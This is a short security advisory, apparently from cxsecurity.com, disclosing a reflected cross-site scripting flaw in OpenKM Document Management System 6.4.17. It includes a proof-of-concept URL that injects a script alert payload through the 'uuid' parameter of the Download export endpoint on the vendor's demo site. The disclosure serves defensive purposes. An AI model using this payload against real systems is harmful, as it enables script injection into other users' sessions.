Openkm Document Management System 6.4.17 Cross Site Scripting

2014.11.18
Credit: khalil
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Openkm Document Management System Suffers From Cross Site Scripting Attack http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili ties/openkm.jpg Version <=6.4.17 Software Test http://demo.openkm.com/OpenKM/login.jsp Auther : <https://www.facebook.com/khalil.shr> Khalil <https://www.facebook.com/khalil.shr> Shreateh Auther Website: http://khalil-shreateh.com Status : Reported . Report Link : http://issues.openkm.com/view.php?id=3056 Attack Description log in with any user Navigate to : <http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Eale rt%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E > http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealer t%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E POC IMAGE : http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabili ties/xss.jpg


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top